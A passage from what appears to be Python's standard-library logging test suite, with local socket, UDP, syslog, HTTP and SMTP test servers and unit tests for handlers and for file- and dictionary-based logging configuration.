:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
_block_on_close = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPHandlerTest(BaseTest):
# bpo-14314, bpo-19665, bpo-34092: don't wait forever, timeout of 1 minute
TIMEOUT = 60.0
def test_basic(self):
sockmap = {}
server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (support.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT)
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
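# Illustrative sketch (not part of the original test suite): the buffering
# pattern exercised by MemoryHandlerTest -- records are held until the
# capacity is reached or a record at/above the flush level arrives, then
# flushed to the target handler. The helper is hypothetical and never called.
def _example_memory_handler(target_handler):
    mem = logging.handlers.MemoryHandler(10, logging.WARNING, target_handler)
    logging.getLogger('example.buffered').addHandler(mem)
    return mem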
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config 8, check for resource warning
config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config8_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
# Replace single backslash with double backslash in windows
# to avoid unicode error during string formatting
if os.name == "nt":
fn = fn.replace("\\", "\\\\")
config8 = self.config8.format(tempfile=fn)
self.apply_config(config8)
self.apply_config(config8)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
if threading:
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
if self.server:
self.server.stop(2.0)
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
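            # SocketHandler frames each record as a 4-byte big-endian length
            # prefix followed by a pickled dict of LogRecord attributes.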
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
if self.server_exception:
self.skipTest(self.server_exception)
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop(2.0)
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(threading, 'Threading required for this test.')
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
if threading:
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
if self.server:
self.server.stop(2.0)
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
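        # DatagramHandler prepends the same 4-byte length prefix as
        # SocketHandler; for a single UDP packet it can simply be skipped.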
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
if threading:
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sl_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls((server.server_address[0], server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the server."""
try:
if self.server:
self.server.stop(2.0)
if self.sl_hdlr:
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
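        # '<11>' is the syslog priority octet: facility LOG_USER (1) * 8 +
        # severity LOG_ERR (3); append_nul (the default) adds a trailing NUL.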
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(support.IPV6_ENABLED,
'IPv6 support required for this test.')
@unittest.skipUnless(threading, 'Threading required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with IPv6 host."""
server_class = None # TestUDPServer
address = ('::1', 0)
def setUp(self):
self.server_class.address_family = socket.AF_INET6
super(IPv6SysLogHandlerTest, self).setUp()
def tearDown(self):
self.server_class.address_family = socket.AF_INET
super(IPv6SysLogHandlerTest, self).tearDown()
@unittest.skipUnless(threading, 'Threading required for this test.')
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
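            # For POST the urlencoded record travels in the request body; for
            # GET it is carried in the query string (parsed in test_output).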
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
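# Illustrative sketch (not part of the original test suite): outside the test
# harness, attaching an HTTPHandler looks roughly like this. The host and URL
# are placeholders and the helper is never called here.
def _example_http_handler():
    handler = logging.handlers.HTTPHandler('localhost:8080', '/log', method='POST')
    logging.getLogger('example.http').addHandler(handler)
    return handler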
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
# Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
# Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
# Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
# See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
